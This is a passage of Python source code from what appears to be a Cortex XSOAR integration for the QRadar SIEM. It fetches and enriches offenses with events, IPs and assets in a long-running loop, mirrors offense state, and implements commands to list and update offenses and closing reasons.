def enrich_assets_results(client: Client, assets: Any, full_enrichment: bool) -> List[Dict]:
"""
Receives list of assets, and enriches each asset with 'Endpoint' entry containing the following:
- IP addresses of all interfaces.
- OS name.
- MAC addresses of the interfaces, if full enrichment was requested.
- Domain name if full enrichment was requested.
- Properties enrichment.
Args:
client (Client): Client to perform API call to retrieve domain names corresponding to the domain IDs.
assets (List[Dict]): List of assets to be enriched.
full_enrichment (bool): Whether the asset should be full enriched.
Returns:
(List[Dict]) List of new assets with enrichment.
"""
domain_id_name_dict = get_domain_names(client, assets) if full_enrichment else dict()
def enrich_single_asset(asset: Dict) -> Dict:
updated_asset = add_iso_entries_to_asset(asset)
interfaces = updated_asset.get('interfaces', [])
properties = updated_asset.get('properties', [])
domain_id = updated_asset.get('domain_id')
os_name = next((prop.get('value') for prop in properties if prop.get('name') == 'Primary OS ID'), None)
ip_enrichment = {
'IPAddress': [ip_add.get('value') for interface in interfaces
for ip_add in interface.get('ip_addresses', [])
if ip_add.get('value')]
}
os_enrichment = {'OS': os_name} if os_name else dict()
mac_enrichment = {
'MACAddress': [interface.get('mac_address') for interface in interfaces if
interface.get('mac_address')]
} if full_enrichment else dict()
domains_enrichment = {'Domain': domain_id_name_dict.get(domain_id, domain_id)} \
if full_enrichment and domain_id else dict()
basic_properties_enrichment = enrich_asset_properties(properties, ASSET_PROPERTIES_NAME_MAP)
full_properties_enrichment = enrich_asset_properties(properties,
FULL_ASSET_PROPERTIES_NAMES_MAP) \
if full_enrichment else dict()
enriched_asset = dict(asset, **basic_properties_enrichment, **full_properties_enrichment)
return {'Asset': add_iso_entries_to_asset(enriched_asset),
'Endpoint': dict(ip_enrichment, **os_enrichment, **mac_enrichment,
**domains_enrichment)}
return [enrich_single_asset(asset) for asset in assets]
def get_minimum_id_to_fetch(highest_offense_id: int, user_query: Optional[str]) -> int:
"""
Receives the highest offense ID saved from last run, and user query.
Checks if user query has a limitation for a minimum ID.
If such ID exists, returns the maximum between 'highest_offense_id' and the minimum ID
limitation received by the user query.
Args:
highest_offense_id (int): Minimum ID to fetch offenses by from last run.
user_query (Optional[str]): User query for QRadar service.
Returns:
(int): The Minimum ID to fetch offenses by.
"""
if user_query:
id_query = ID_QUERY_REGEX.search(user_query)
if id_query:
id_query_raw = id_query.group(0)
operator = '>=' if '>=' in id_query_raw else '>'
# safe to int parse without catch because regex checks for number
user_offense_id = int(id_query.group(0).split(operator)[1].strip())
user_lowest_offense_id = user_offense_id if operator == '>' else user_offense_id - 1
print_debug_msg(f'Found ID in user query: {user_lowest_offense_id}, last highest ID: {highest_offense_id}')
return max(highest_offense_id, user_lowest_offense_id)
return highest_offense_id
def get_offense_enrichment(enrichment: str) -> Tuple[bool, bool]:
"""
Receives enrichment asked by the user, returns true or false values indicating which enrichment should be done.
Args:
enrichment (Optional[str]): Enrichment argument.
Returns:
(bool, bool): Tuple of (ip_enrich, asset_enrich).
"""
if enrichment == 'IPs And Assets':
return True, True
if enrichment == 'IPs':
return True, False
return False, False
def print_debug_msg(msg: str):
"""
Prints a message to debug with QRadarMsg prefix.
Args:
msg (str): Message to be logged.
"""
demisto.debug(f'QRadarMsg - {msg}')
def reset_mirroring_events_variables(mirror_options: str):
"""In case of change in mirror_options initialize mirror with events context data variables.
Args:
mirror_options: The current mirror options
Returns: None
"""
ctx = extract_context_data(get_integration_context().copy())
try:
print_mirror_events_stats(ctx, f"New Long Running Container - Before Mirroring Variables Reset, "
f"Mirror Option {mirror_options}")
except Exception as e:
print_debug_msg(f'Could not print mirror_events_stats due to error: {str(e)} \n '
f'Reseting mirroring vars')
mirror_options = 'needs reset to mirroring vars'
if mirror_options != MIRROR_OFFENSE_AND_EVENTS:
ctx[UPDATED_MIRRORED_OFFENSES_CTX_KEY] = []
ctx[MIRRORED_OFFENSES_CTX_KEY] = []
ctx[RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY] = []
print_mirror_events_stats(ctx, "New Long Running Container - After Mirroring Variables Reset")
set_to_integration_context_with_retries(encode_context_data(ctx))
def is_reset_triggered():
"""
Checks if reset of integration context have been made by the user.
Because fetch is long running execution, user communicates with us
by calling 'qradar-reset-last-run' command which sets reset flag in
context.
Returns:
(bool):
- True if reset flag was set. If 'handle_reset' is true, also resets integration context.
- False if reset flag was not found in integration context.
"""
ctx = get_integration_context()
if ctx and RESET_KEY in ctx:
print_debug_msg('Reset fetch-incidents.')
set_integration_context({'samples': '[]'})
return True
return False
def validate_long_running_params(params: Dict) -> None:
"""
Receives params, checks whether the required parameters for long running execution is configured.
Args:
params (Dict): Cortex XSOAR params.
Returns:
(None): If all required params are set, raises DemistoException otherwise.
"""
for param_field, param_display in LONG_RUNNING_REQUIRED_PARAMS.items():
if param_field not in params:
raise DemistoException(f'Parameter {param_display} is required when enabling long running execution.'
' Please set a value for it.')
''' COMMAND FUNCTIONS '''
def test_module_command(client: Client, params: Dict) -> str:
"""
Tests API connectivity and authentication'
Returning 'ok' indicates that the integration works like it is supposed to.
Connection to the service is successful.
Raises exceptions if something goes wrong.
Args:
client (Client): Client to perform the API calls.
params (Dict): Demisto params.
Returns:
- (str): 'ok' if test passed
- raises DemistoException if something had failed the test.
"""
try:
ctx = extract_context_data(get_integration_context(), include_id=True)
print_mirror_events_stats(ctx, "Test Module")
is_long_running = params.get('longRunning')
if is_long_running:
validate_long_running_params(params)
ip_enrich, asset_enrich = get_offense_enrichment(params.get('enrichment', 'IPs And Assets'))
# Try to retrieve the last successfully retrieved offense
last_highest_id = max(ctx.get(LAST_FETCH_KEY, 0) - 1, 0)
get_incidents_long_running_execution(
client=client,
offenses_per_fetch=1,
user_query=params.get('query', ''),
fetch_mode=params.get('fetch_mode', ''),
events_columns=params.get('events_columns', ''),
events_limit=0,
ip_enrich=ip_enrich,
asset_enrich=asset_enrich,
last_highest_id=last_highest_id,
incident_type=params.get('incident_type'),
mirror_direction=MIRROR_DIRECTION.get(params.get('mirror_options', DEFAULT_MIRRORING_DIRECTION))
)
else:
client.offenses_list(range_="items=0-0")
message = 'ok'
except DemistoException as e:
err_msg = str(e)
if 'unauthorized to access the requested resource' in err_msg or 'No SEC header present in request' in err_msg:
message = 'Authorization Error: make sure credentials are correct.'
else:
raise e
return message
def fetch_incidents_command() -> List[Dict]:
"""
Fetch incidents implemented, for mapping purposes only.
Returns list of samples saved by long running execution.
Returns:
(List[Dict]): List of incidents samples.
"""
ctx = get_integration_context()
return extract_context_data(ctx).get('samples', [])
def create_search_with_retry(client: Client, fetch_mode: str, offense: Dict, event_columns: str, events_limit: int,
max_retries: int = EVENTS_FAILURE_LIMIT) -> Optional[Dict]:
"""
Creates a search to retrieve events for an offense.
Has retry mechanism, because QRadar service tends to return random errors when
it is loaded.
Therefore, 'max_retries' retries will be made, to try avoid such cases as much as possible.
Args:
client (Client): Client to perform the API calls.
fetch_mode (str): Which enrichment mode was requested.
Can be 'Fetch With All Events', 'Fetch Correlation Events Only'
offense (Dict): Offense ID to enrich with events.
event_columns (str): Columns of the events to be extracted from query.
events_limit (int): Maximum number of events to enrich the offense.
max_retries (int): Number of retries.
Returns:
(Dict): If search was created successfully.
None: If reset was triggered or number of retries exceeded limit.
"""
additional_where = ''' AND LOGSOURCETYPENAME(devicetype) = 'Custom Rule Engine' ''' \
if fetch_mode == FetchMode.correlations_events_only.value else ''
# Decrease 1 minute from start_time to avoid the case where the minute queried of start_time equals end_time.
offense_start_time = offense['start_time'] - 60 * 1000
offense_id = offense['id']
query_expression = (
f'SELECT {event_columns} FROM events WHERE INOFFENSE({offense_id}) {additional_where} limit {events_limit} '
f'START {offense_start_time}'
)
print_debug_msg(f'Trying to get events for offense ID: {offense_id}, '
f'offense_start_time: {offense_start_time}, '
f'additional_where: {additional_where}, '
f'events_limit: {events_limit}.')
num_of_failures = 0
while num_of_failures <= max_retries:
try:
print_debug_msg(f'Creating search for offense ID: {offense_id}, '
f'query_expression: {query_expression}.')
ret_value = client.search_create(query_expression=query_expression)
print_debug_msg(f'Created search for offense ID: {offense_id}, '
f'offense_start_time: {offense_start_time}, '
f'additional_where: {additional_where}, '
f'events_limit: {events_limit}, '
f'ret_value: {ret_value}.')
return ret_value
except Exception:
print_debug_msg(f'Failed to create search for offense ID: {offense_id}. '
f'Retry number {num_of_failures}/{max_retries}.')
print_debug_msg(traceback.format_exc())
num_of_failures += 1
if num_of_failures == max_retries:
print_debug_msg(f'Max retries for creating search for offense: {offense_id}. Returning empty.')
break
time.sleep(FAILURE_SLEEP)
print_debug_msg(f'Returning empty events for offense ID: {offense_id}.')
return None
def poll_offense_events_with_retry(client: Client, search_id: str, offense_id: int,
max_retries: int = EVENTS_FAILURE_LIMIT) -> Tuple[List[Dict], str]:
"""
Polls QRadar service for search ID given until status returned is within '{'CANCELED', 'ERROR', 'COMPLETED'}'.
Afterwards, performs a call to retrieve the events returned by the search.
Has retry mechanism, because QRadar service tends to return random errors when
it is loaded.
Therefore, 'max_retries' retries will be made, to try avoid such cases as much as possible.
Args:
client (Client): Client to perform the API calls.
search_id (str): ID of the search to poll for its status.
offense_id (int): ID of the offense to enrich with events returned by search. Used for logging purposes here.
max_retries (int): Number of retries.
Returns:
(List[Dict], str): List of events returned by query. Returns empty list if number of retries exceeded limit,
A failure message in case an error occured.
"""
num_of_failures = 0
start_time = time.time()
failure_message = ''
while num_of_failures <= max_retries:
try:
print_debug_msg(f"Getting search status for {search_id}")
search_status_response = client.search_status_get(search_id)
print_debug_msg(f"Got search status for {search_id}")
query_status = search_status_response.get('status')
# failures are relevant only when consecutive
num_of_failures = 0
print_debug_msg(f'Search query_status: {query_status}')
# Possible values for query_status: {'CANCELED', 'ERROR', 'COMPLETED'}
# Don't try to get events if CANCELLED or ERROR
if query_status in {'CANCELED', 'ERROR'}:
if failure_message == '':
failure_message = f'query_status is {query_status}'
return [], failure_message
elif query_status == 'COMPLETED':
print_debug_msg(f'Getting events for offense {offense_id}')
search_results_response = client.search_results_get(search_id)
print_debug_msg(f'Http response: {search_results_response.get("http_response", "Not specified - ok")}')
events = search_results_response.get('events', [])
sanitized_events = sanitize_outputs(events)
print_debug_msg(f'Fetched {len(sanitized_events)} events for offense {offense_id}.')
return sanitized_events, failure_message
elapsed = time.time() - start_time
if elapsed >= FETCH_SLEEP: # print status debug every fetch sleep (or after)
print_debug_msg(f'Still fetching offense {offense_id} events, search_id: {search_id}.')
start_time = time.time()
time.sleep(EVENTS_INTERVAL_SECS)
except Exception as e:
print_debug_msg(
f'Error while fetching offense {offense_id} events, search_id: {search_id}. Error details: {str(e)} \n'
f'{traceback.format_exc()}')
num_of_failures += 1
if num_of_failures < max_retries:
time.sleep(FAILURE_SLEEP)
else:
failure_message = f'{repr(e)} \nSee logs for further details.'
print_debug_msg(f'Could not fetch events for offense ID: {offense_id}, returning empty events array.')
return [], failure_message
def enrich_offense_with_events(client: Client, offense: Dict, fetch_mode: str, events_columns: str, events_limit: int,
max_retries: int = MAX_FETCH_EVENT_RETIRES):
"""
Enriches offense given with events.
Has retry mechanism for events returned by query to QRadar. This is needed because events might not be
indexed when performing the search, and QRadar will return less events than expected.
Retry mechanism here meant to avoid such cases as much as possible
Args:
client (Client): Client to perform the API calls.
offense (Dict): Offense to enrich with events.
fetch_mode (str): Which enrichment mode was requested.
Can be 'Fetch With All Events', 'Fetch Correlation Events Only'
events_columns (str): Columns of the events to be extracted from query.
events_limit (int): Maximum number of events to enrich the offense.
max_retries (int): Number of retries.
Returns:
(Dict): Enriched offense with events.
"""
failure_message = ''
events: List[dict] = []
min_events_size = min(offense.get('event_count', 0), events_limit)
# decreasing 1 minute from the start_time to avoid the case where the minute queried of start_time equals end_time.
for i in range(max_retries):
# retry to check if we got all the event (its not an error retry), see docstring
search_response = create_search_with_retry(client, fetch_mode, offense, events_columns,
events_limit)
if not search_response:
continue
offense_id = offense['id']
events, failure_message = poll_offense_events_with_retry(client, search_response['search_id'], offense_id)
print_debug_msg(f"Polled events for offense ID {offense_id}")
if len(events) >= min_events_size:
print_debug_msg(f"Fetched {len(events)}/{min_events_size} for offense ID {offense_id}")
break
print_debug_msg(f'Did not fetch enough events. Expected at least {min_events_size}. Retrying to fetch events '
f'for offense ID: {offense_id}. Retry number {i}/{max_retries}')
if i < max_retries - 1:
time.sleep(SLEEP_FETCH_EVENT_RETIRES)
print_debug_msg(f"Reached max retries for offense {offense.get('id')} with failure message {failure_message}")
if failure_message == '' and len(events) < min_events_size:
failure_message = 'Events were probably not indexed in QRadar at the time of the mirror.'
offense = dict(offense, mirroring_events_message=failure_message)
if events:
offense = dict(offense, events=events)
return offense
def get_incidents_long_running_execution(client: Client, offenses_per_fetch: int, user_query: str, fetch_mode: str,
events_columns: str, events_limit: int, ip_enrich: bool, asset_enrich: bool,
last_highest_id: int, incident_type: Optional[str],
mirror_direction: Optional[str]) -> Tuple[Optional[List[Dict]], Optional[int]]:
"""
Gets offenses from QRadar service, and transforms them to incidents in a long running execution.
Args:
client (Client): Client to perform the API calls.
offenses_per_fetch (int): Maximum number of offenses to be fetched.
user_query (str): If given, the user filters for fetching offenses from QRadar service.
fetch_mode (str): Fetch mode of the offenses.
Can be 'Fetch Without Events', 'Fetch With All Events', 'Fetch Correlation Events Only'
events_columns (str): Events columns to extract by search query for each offense. Only used when fetch mode
is not 'Fetch Without Events'.
events_limit (int): Number of events to be fetched for each offense. Only used when fetch mode is not
'Fetch Without Events'.
ip_enrich (bool): Whether to enrich offense by changing IP IDs of each offense to its IP value.
asset_enrich (bool): Whether to enrich offense with assets
last_highest_id (int): The highest ID of all the offenses that have been fetched from QRadar service.
incident_type (Optional[str]): Incident type.
mirror_direction (Optional[str]): Whether mirror in is activated or not.
Returns:
(List[Dict], int): List of the incidents, and the new highest ID for next fetch.
(None, None): if reset was triggered
"""
offense_highest_id = get_minimum_id_to_fetch(last_highest_id, user_query)
user_query = f' AND {user_query}' if user_query else ''
filter_fetch_query = f'id>{offense_highest_id}{user_query}'
print_debug_msg(f'Filter query to QRadar: {filter_fetch_query}')
range_max = offenses_per_fetch - 1 if offenses_per_fetch else MAXIMUM_OFFENSES_PER_FETCH - 1
range_ = f'items=0-{range_max}'
# if it fails here we can't recover, retry again later
raw_offenses = client.offenses_list(range_, filter_=filter_fetch_query, sort=ASCENDING_ID_ORDER)
if raw_offenses:
raw_offenses_len = len(raw_offenses)
print_debug_msg(f'raw_offenses size: {raw_offenses_len}')
else:
print_debug_msg('empty raw_offenses')
new_highest_offense_id = raw_offenses[-1].get('id') if raw_offenses else offense_highest_id
print_debug_msg(f'New highest ID returned from QRadar offenses: {new_highest_offense_id}')
offenses = []
if fetch_mode != FetchMode.no_events.value:
try:
futures = []
for offense in raw_offenses:
futures.append(EXECUTOR.submit(
enrich_offense_with_events,
client=client,
offense=offense,
fetch_mode=fetch_mode,
events_columns=events_columns,
events_limit=events_limit,
))
offenses = [future.result(timeout=DEFAULT_EVENTS_TIMEOUT * 60) for future in futures]
except concurrent.futures.TimeoutError as e:
demisto.error(
f"Error while enriching mirrored offenses with events: {str(e)} \n {traceback.format_exc()}")
update_missing_offenses_from_raw_offenses(raw_offenses, offenses)
else:
offenses = raw_offenses
if is_reset_triggered():
return None, None
offenses_with_mirror = [
dict(offense, mirror_direction=mirror_direction, mirror_instance=demisto.integrationInstance())
for offense in offenses] if mirror_direction else offenses
enriched_offenses = enrich_offenses_result(client, offenses_with_mirror, ip_enrich, asset_enrich)
final_offenses = sanitize_outputs(enriched_offenses)
incidents = create_incidents_from_offenses(final_offenses, incident_type)
return incidents, new_highest_offense_id
def update_missing_offenses_from_raw_offenses(raw_offenses: list, offenses: list):
"""
Populate offenses with missing offenses
"""
offenses_ids = {offense['id'] for offense in raw_offenses} or set()
updated_offenses_ids = {offense['id'] for offense in offenses} or set()
missing_ids = offenses_ids - updated_offenses_ids
if missing_ids:
for offense in raw_offenses:
if offense['id'] in missing_ids:
offenses.append(offense)
def exclude_lists(original: List[dict], exclude: List[dict], key: str):
"""Exclude nodes of exclude list from the original list by key
Args:
original: The original list to exclude from
exclude: The list of nodes to exclude
key: The key to exclude by
Returns: A list with the original nodes that were not excluded.
"""
exclude_keys = [excluded_node.get(key) for excluded_node in exclude]
return [element.copy() for element in original if element.get(key) not in exclude_keys]
def update_mirrored_events(client: Client,
fetch_mode: str,
events_columns: str,
events_limit: int,
context_data: dict,
offenses_per_fetch: int) -> list:
"""Update mirrored offenses' events assuming a long running container.
Args:
client: Client to perform the API calls.
fetch_mode: Bring correlated / not correlated events.
events_columns: Events columns to extract by search query for each offense.
events_limit: Number of events to be fetched for each offense.
context_data: The integration's current context data. Extract the relevant offenses to update from it.
offenses_per_fetch: The number of offenses to fetch.
Returns: (A list of updated offenses with their events)
"""
offenses = context_data.get(MIRRORED_OFFENSES_CTX_KEY, [])
if len(offenses) > offenses_per_fetch:
offenses = offenses[:offenses_per_fetch]
updated_offenses = []
try:
if len(offenses) > 0:
futures = []
for offense in offenses:
print_debug_msg(f"Updating events in offense: {offense.get('id')}")
futures.append(EXECUTOR.submit(
enrich_offense_with_events,
client=client,
offense=offense,
fetch_mode=fetch_mode,
events_columns=events_columns,
events_limit=events_limit,
))
updated_offenses += [future.result(timeout=DEFAULT_EVENTS_TIMEOUT * 60) for future in futures]
except Exception as e:
print_debug_msg(f"Error while enriching mirrored offenses with events: {str(e)} \n {traceback.format_exc()}")
update_missing_offenses_from_raw_offenses(offenses, updated_offenses)
finally:
return updated_offenses
def create_incidents_from_offenses(offenses: List[Dict], incident_type: Optional[str]) -> List[Dict]:
"""
Transforms list of offenses given into incidents for Demisto.
Args:
offenses (List[Dict]): List of the offenses to transform into incidents.
incident_type (Optional[str]): Incident type to be used for each incident.
Returns:
(List[Dict]): Incidents list.
"""
print_debug_msg(f'Creating {len(offenses)} incidents')
return [{
'name': f'''{offense.get('id')} {offense.get('description', '')}''',
'rawJSON': json.dumps(offense),
'occurred': get_time_parameter(offense.get('start_time'), iso_format=True),
'type': incident_type
} for offense in offenses]
def print_mirror_events_stats(context_data: dict, stage: str) -> Set[str]:
"""Print debug message with information about mirroring events.
Args:
context_data: The integration context data.
stage: A prefix for the debug message.
Returns: The ids of the mirrored offenses being currently processed.
"""
if not context_data:
print_debug_msg("Not printing stats")
return set()
updated = context_data.get(UPDATED_MIRRORED_OFFENSES_CTX_KEY, [])
waiting_for_update = context_data.get(MIRRORED_OFFENSES_CTX_KEY, [])
resubmitted_ids = context_data.get(RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY, [])
last_fetch_key = context_data.get(LAST_FETCH_KEY, 'Missing')
last_mirror_update = context_data.get('last_mirror_update', 0)
samples = context_data.get('samples', [])
sample_length = 0
if samples:
sample_length = len(samples[0])
not_updated_ids = [str(offense.get('id')) for offense in waiting_for_update]
stats = [(str(offense.get('id')), len(offense.get('events', []))) for offense in updated]
print_debug_msg(f"Mirror Events Stats: {stage}\n Updated Offenses (id, len(events)): {stats}"
f"\n Offenses ids waiting for update: {not_updated_ids}"
f"\n Resubmitted offenses: {resubmitted_ids}"
f"\n Last Fetch Key {last_fetch_key}, Last mirror update {last_mirror_update}, "
f"sample length {sample_length}")
updated_ids = [offense_id for offense_id, events_num in stats]
return set(not_updated_ids + updated_ids + resubmitted_ids)
@safely_update_context_data
def move_updated_offenses(context_data: dict, version: Any, include_context_data: dict,
updated_list: list) -> Tuple[dict, Any, Any]:
"""Move updated offenses from MIRRORED_OFFENSES_CTX_KEY to UPDATED_MIRRORED_OFFENSES_CTX_KEY.
Args:
context_data: The context data to update
version: The version of the context data
include_context_data: The context data changes to include
updated_list: The list of updated offenses
Returns: (The new context data, the context data version the changes were based on, The new context_data)
"""
new_context_data = include_context_data.copy()
if updated_list:
all_updated_mirrored_offenses = merge_lists(
original_list=context_data.get(UPDATED_MIRRORED_OFFENSES_CTX_KEY, []),
updated_list=updated_list, key='id')
not_updated_list = exclude_lists(original=context_data.get(MIRRORED_OFFENSES_CTX_KEY, []),
exclude=updated_list, key="id")
new_context_data.update({UPDATED_MIRRORED_OFFENSES_CTX_KEY: all_updated_mirrored_offenses,
MIRRORED_OFFENSES_CTX_KEY: not_updated_list,
RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY:
context_data.get(RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY, [])}) # type: ignore
else:
new_context_data.update(
{UPDATED_MIRRORED_OFFENSES_CTX_KEY: context_data.get(UPDATED_MIRRORED_OFFENSES_CTX_KEY, []),
MIRRORED_OFFENSES_CTX_KEY: context_data.get(MIRRORED_OFFENSES_CTX_KEY, []),
RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY:
context_data.get(RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY, [])})
if not new_context_data.get('samples'):
new_context_data.update({'samples': context_data.get('samples')})
if not new_context_data.get('last_mirror_update'):
new_context_data.update({'last_mirror_update': str(context_data.get('last_mirror_update', 0))})
return encode_context_data(new_context_data, include_id=True), version, new_context_data
def perform_long_running_loop(client: Client, offenses_per_fetch: int, fetch_mode: str, mirror_options: str,
user_query: str, events_columns: str, events_limit: int, ip_enrich: bool,
asset_enrich: bool, incident_type: Optional[str], mirror_direction: Optional[str]):
is_reset_triggered()
ctx, ctx_version = get_integration_context_with_version()
print_debug_msg(f'Starting fetch loop. Fetch mode: {fetch_mode}, Mirror option: {mirror_options}.')
incidents, new_highest_id = get_incidents_long_running_execution(
client=client,
offenses_per_fetch=offenses_per_fetch,
user_query=user_query,
fetch_mode=fetch_mode,
events_columns=events_columns,
events_limit=events_limit,
ip_enrich=ip_enrich,
asset_enrich=asset_enrich,
last_highest_id=int(json.loads(ctx.get(LAST_FETCH_KEY, '0'))),
incident_type=incident_type,
mirror_direction=mirror_direction
)
orig_context_data = extract_context_data(ctx.copy(), include_id=True)
context_data = {LAST_FETCH_KEY: orig_context_data.get(LAST_FETCH_KEY, 0)}
updated_mirrored_offenses = None
ctx = extract_context_data(ctx)
if mirror_options == MIRROR_OFFENSE_AND_EVENTS:
print_mirror_events_stats(ctx, "Long Running Command - Before Update")
updated_mirrored_offenses = update_mirrored_events(client=client,
fetch_mode=fetch_mode,
events_columns=events_columns,
events_limit=events_limit,
context_data=ctx,
offenses_per_fetch=offenses_per_fetch)
if incidents and new_highest_id:
incident_batch_for_sample = incidents[:SAMPLE_SIZE] if incidents else ctx.get('samples', [])
if incident_batch_for_sample:
print_debug_msg(f'Saving New Highest ID: {new_highest_id}')
context_data.update({'samples': incident_batch_for_sample, LAST_FETCH_KEY: int(new_highest_id)})
# if incident creation fails, it'll drop the data and try again in the next iteration
demisto.createIncidents(incidents)
new_context_data = move_updated_offenses(context_data=ctx, version=ctx_version,
include_context_data=context_data,
updated_list=updated_mirrored_offenses)
print_mirror_events_stats(new_context_data, "Long Running Command - After Update")
def long_running_execution_command(client: Client, params: Dict):
"""
Long running execution of fetching incidents from QRadar service.
Will continue to fetch in an infinite loop offenses from QRadar,
Enriching each offense with events/IPs/assets according to the
configurations given in Demisto params.
transforming the offenses into incidents and sending them to Demisto
to save the incidents.
Args:
client (Client): Client to perform API calls.
params (Dict): Demisto params.
"""
validate_long_running_params(params)
fetch_mode = params.get('fetch_mode', '')
ip_enrich, asset_enrich = get_offense_enrichment(params.get('enrichment', 'IPs And Assets'))
offenses_per_fetch = int(params.get('offenses_per_fetch')) # type: ignore
user_query = params.get('query', '')
events_columns = params.get('events_columns', '')
events_limit = int(params.get('events_limit') or DEFAULT_EVENTS_LIMIT)
incident_type = params.get('incident_type')
mirror_options = params.get('mirror_options', DEFAULT_MIRRORING_DIRECTION)
mirror_direction = MIRROR_DIRECTION.get(mirror_options)
reset_mirroring_vars = False
while not reset_mirroring_vars:
try:
reset_mirroring_events_variables(mirror_options)
reset_mirroring_vars = True
except Exception as e:
print_debug_msg(
f'Error while reseting mirroring variables, retring. Error details: {str(e)} \n'
f'{traceback.format_exc()}')
demisto.error('Exception when calling reset_mirroring_events_variables')
raise e
while True:
try:
perform_long_running_loop(
client=client,
offenses_per_fetch=offenses_per_fetch,
fetch_mode=fetch_mode,
mirror_options=mirror_options,
user_query=user_query,
events_columns=events_columns,
events_limit=events_limit,
ip_enrich=ip_enrich,
asset_enrich=asset_enrich,
incident_type=incident_type,
mirror_direction=mirror_direction
)
except Exception:
demisto.error('Error occurred during long running loop')
demisto.error(traceback.format_exc())
finally:
print_debug_msg('Finished fetch loop')
time.sleep(FETCH_SLEEP)
def qradar_offenses_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves list of offenses from QRadar service.
possible arguments:
- offense_id: Retrieves details of the specific offense that corresponds to the ID given.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
offense_id = args.get('offense_id')
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
ip_enrich, asset_enrich = get_offense_enrichment(args.get('enrichment', 'None'))
# if this call fails, raise an error and stop command execution
response = client.offenses_list(range_, offense_id, filter_, fields)
enriched_outputs = enrich_offenses_result(client, response, ip_enrich, asset_enrich)
final_outputs = sanitize_outputs(enriched_outputs, OFFENSE_OLD_NEW_NAMES_MAP)
headers = build_headers(['ID', 'Description', 'OffenseType', 'Status', 'Severity'],
set(OFFENSE_OLD_NEW_NAMES_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('Offenses List', final_outputs, headers=headers, removeNull=True),
outputs_prefix='QRadar.Offense',
outputs_key_field='ID',
outputs=final_outputs,
raw_response=response
)
def qradar_offense_update_command(client: Client, args: Dict) -> CommandResults:
"""
Updates offense that corresponds to the given offense ID.
possible arguments:
- offense_id (Required): Update offense that corresponds to ID given.
- protected: Whether the offense is protected.
- follow_up: Whether the offense should be marked for follow up.
- status: Status of the offense. One of 'OPEN', 'HIDDEN', 'CLOSED'.
- closing_reason_id: The ID of the reason the offense was closed. full list of closing reason IDs,
full list of closing reason IDs can be retrieved by 'qradar-closing-reasons' command.
- assigned_to: The user whom to assign the offense to.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
offense_id: int = int(args['offense_id'])
protected = args.get('protected')
follow_up = args.get('follow_up')
closing_reason_name = args.get('closing_reason_name')
status = args.get('status')
closing_reason_id = args.get('closing_reason_id')
if status == 'CLOSED' and (not closing_reason_id and not closing_reason_name):
raise DemistoException(
'''Closing reason ID must be provided when closing an offense. Available closing reasons can be achieved
by 'qradar-closing-reasons' command.'''
)
if closing_reason_name:
# if this call fails, raise an error and stop command execution
closing_reasons_list = client.closing_reasons_list(include_deleted=True, include_reserved=True)
for closing_reason in closing_reasons_list:
if closing_reason.get('text') == closing_reason_name:
closing_reason_id = closing_reason.get('id')
if not closing_reason_id:
raise DemistoException(f'Could not find closing reason name {closing_reason_name}. Please provide a valid'
' closing reason name. Closing reasons can be retrieved by running the '
'qradar-closing-reasons command.')
assigned_to = args.get('assigned_to')
fields = args.get('fields')
ip_enrich, asset_enrich = get_offense_enrichment(args.get('enrichment', 'None'))
# if this call fails, raise an error and stop command execution
response = client.offense_update(offense_id, protected, follow_up, status, closing_reason_id, assigned_to,
fields)
enriched_outputs = enrich_offenses_result(client, response, ip_enrich, asset_enrich)
final_outputs = sanitize_outputs(enriched_outputs, OFFENSE_OLD_NEW_NAMES_MAP)
headers = build_headers(['ID', 'Description', 'OffenseType', 'Status', 'Severity'],
set(OFFENSE_OLD_NEW_NAMES_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('offense Update', final_outputs, headers, removeNull=True),
outputs_prefix='QRadar.Offense',
outputs_key_field='ID',
outputs=final_outputs,
raw_response=response
)
def qradar_closing_reasons_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves list of closing reasons from QRadar service.
possible arguments:
- closing_reason_id: Retrieves details of the specific closing reason that corresponds to the ID given.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
closing_reason_id = args.get('closing_reason_id')
include_reserved = argToBoolean(args.get('include_reserved', False))
include_deleted = argToBoolean(args.get('include_deleted', False))
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.closing_reasons_list(closing_reason_id, include_reserved, include_deleted, range_, filter_,
fields)
outputs = sanitize_outputs(response, CLOSING_REASONS_OLD_NEW_MAP)
headers = build_headers(['ID', 'Name'], set(CLOSING_REASONS_OLD_NEW_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('Closing Reasons', outputs, headers=headers, removeNull=True),
outputs_prefix='QRadar.Offense.ClosingReasons',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_offense_notes_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves list of notes corresponding to the ID of the offense ID given from QRadar service.
possible arguments:
- offense_id: The offense ID to retrieve the notes for.
- note_id: The note ID to its details.
